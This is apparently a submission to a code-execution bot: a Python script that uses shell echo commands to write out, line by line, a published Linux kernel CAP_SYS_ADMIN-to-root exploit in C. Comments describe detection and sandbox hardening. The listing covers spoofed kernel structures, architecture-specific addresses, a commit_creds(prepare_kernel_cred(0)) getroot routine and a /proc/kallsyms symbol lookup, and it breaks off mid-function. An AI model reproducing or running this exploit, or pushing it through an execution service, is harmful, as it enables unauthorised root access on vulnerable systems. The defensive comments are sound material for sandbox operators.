+/u/CompileBot python
import os
# Submission to a code-execution bot: a Python script that shells out once per
# line to emit the text of a C program (a published local privilege-escalation
# proof of concept, per its own header comment) under the name x.c.
#
# Every os.system() call runs its command in a subshell, so process-creation
# telemetry for this script shows the interpreter spawning one shell per
# statement. That burst of shell children from an interpreter is the
# observable to alert on in a sandbox that accepts untrusted code.
#
# NOTE(review): in every echo call below the text `> x.c` sits inside the
# single-quoted argument, so it is part of the string passed to echo.
# Confirm against the original post whether extraction altered the quoting.
#
# Hardening for operators of such a service: run submissions as an
# unprivileged user with no file capabilities, no shell or compiler in the
# sandbox image, and a patched host kernel. The embedded header states the
# payload needs cap_sys_admin and targets kernels >= 2.6.34.

# Start from an empty x.c in the current working directory.
os.system("rm -f x.c; touch x.c")

# Header comment of the C listing: title, author, release date, the bug it is
# based on, build/usage steps and tested platforms, all as stated by its author.
os.system("echo '/* > x.c '")
os.system("echo '/* > x.c '")
os.system("echo ' * Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) > x.c '")
os.system("echo ' * by Joe Sylve > x.c '")
os.system("echo ' * @jtsylve on twitter > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Released: Jan 7, 2011 > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Based on the bug found by Dan Rosenberg (@djrbliss) > x.c '")
os.system("echo ' * only loosly based on his exploit http://www.exploit-db.com/exploits/15916/ > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Usage: > x.c '")
os.system("echo ' * gcc -w caps-to-root2.c -o caps-to-root2 > x.c '")
os.system("echo ' * sudo setcap cap_sys_admin+ep caps-to-root2 > x.c '")
os.system("echo ' * ./caps-to-root2 > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Kernel Version >= 2.6.34 (untested on earlier versions) > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Tested on Ubuntu 10.10 64-bit and Ubuntu 10.10 32-bit > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * This exploit takes advantage of the same underflow as the original, > x.c '")
os.system("echo ' * but takes a different approach. Instead of underflowing into userspace > x.c '")
os.system("echo ' * (which doesn\'t work on 64-bit systems and is a lot of work), I underflow > x.c '")
os.system("echo ' * to some static values inside of the kernel which are referenced as pointers > x.c '")
os.system("echo ' * to userspace. This method is pretty simple and seems to be reliable. > x.c '")
os.system("echo ' */ > x.c '")
os.system("echo ' > x.c '")

# Standard C headers the listing includes.
os.system("echo '#include <stdio.h> > x.c '")
os.system("echo '#include <sys/socket.h> > x.c '")
os.system("echo '#include <errno.h> > x.c '")
os.system("echo '#include <string.h> > x.c '")
os.system("echo '#include <sys/mman.h> > x.c '")
os.system("echo '#include <unistd.h> > x.c '")
os.system("echo ' > x.c '")

# Two struct declarations that the listing's own comment describes as
# skeletons of kernel structures.
os.system("echo '// Skeleton Structures of the Kernel Structures we\'re going to spoof > x.c '")
os.system("echo 'struct proto_ops_skel { > x.c '")
os.system("echo ' int family; > x.c '")
os.system("echo ' void *buffer1[8]; > x.c '")
os.system("echo ' int (*ioctl)(void *, int, long); > x.c '")
os.system("echo ' void *buffer2[12]; > x.c '")
os.system("echo '}; > x.c '")
os.system("echo ' > x.c '")
os.system("echo 'struct phonet_protocol_skel { > x.c '")
os.system("echo ' void *ops; > x.c '")
os.system("echo ' void *prot; > x.c '")
os.system("echo ' int sock_type; > x.c '")
os.system("echo '}; > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' > x.c '")

# Per-architecture constants and function-pointer typedefs, selected with
# #ifdef __x86_64__ / #else. The 32-bit typedefs carry regparm(3).
os.system("echo '#ifdef __x86_64__ > x.c '")
os.system("echo ' > x.c '")
os.system("echo '#define SYM_NAME \"local_port_range\" > x.c '")
os.system("echo '#define SYM_ADDRESS 0x0000007f00000040 > x.c '")
os.system("echo '#define SYM_OFFSET 0x0 > x.c '")
os.system("echo ' > x.c '")
os.system("echo 'typedef int (* _commit_creds)(unsigned long cred); > x.c '")
os.system("echo 'typedef unsigned long (* _prepare_kernel_cred)(unsigned long cred); > x.c '")
os.system("echo ' > x.c '")
os.system("echo '#else //32-bit > x.c '")
os.system("echo ' > x.c '")
os.system("echo '#define SYM_NAME \"pn_proto\" > x.c '")
os.system("echo '#define SYM_ADDRESS 0x4e4f4850 > x.c '")
os.system("echo '#define SYM_OFFSET 0x90 > x.c '")
os.system("echo ' > x.c '")
os.system("echo 'typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); > x.c '")
os.system("echo 'typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); > x.c '")
os.system("echo ' > x.c '")
os.system("echo '#endif > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' > x.c '")

# Global function pointers of the typedef'd types, then getroot(), whose body
# is the single call commit_creds(prepare_kernel_cred(0)) followed by return 0.
os.system("echo '_commit_creds commit_creds; > x.c '")
os.system("echo '_prepare_kernel_cred prepare_kernel_cred; > x.c '")
os.system("echo ' > x.c '")
os.system("echo 'int getroot(void * v, int i, long l) > x.c '")
os.system("echo '{ > x.c '")
os.system("echo ' commit_creds(prepare_kernel_cred(0)); > x.c '")
os.system("echo ' return 0; > x.c '")
os.system("echo '} > x.c '")
os.system("echo ' > x.c '")
os.system("echo '/* thanks spender... */ > x.c '")
os.system("echo 'unsigned long get_kernel_sym(char *name) > x.c '")
os.system("echo '{ > x.c '")
os.system("echo ' FILE *f; > x.c '")
os.system("echo ' unsigned long addr; > x.c '")
os.system("echo ' char dummy; > x.c '")
os.system("echo ' char sname[512]; > x.c '")
os.system("echo ' int ret; > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' char command[512]; > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' sprintf(command, \"grep \\"%s\\" /proc/kallsyms\", name); > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' f = popen(command, \"r\"); > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' while(ret != EOF) { > x.c '")
os.system("echo ' ret = fscanf(f, \"%p %c %s\n\", (void **) &addr, &dummy, sname); > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' if (ret == 0) { > x.c '")
os.system("echo ' fscanf(f, \"%s\n\", sname); > x.c '")
os.system("echo ' continue; > x.c '")
os.system("echo ' } > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' if (!strcmp(name, sname)) { > x.c '")
os.system("echo ' > x.c '")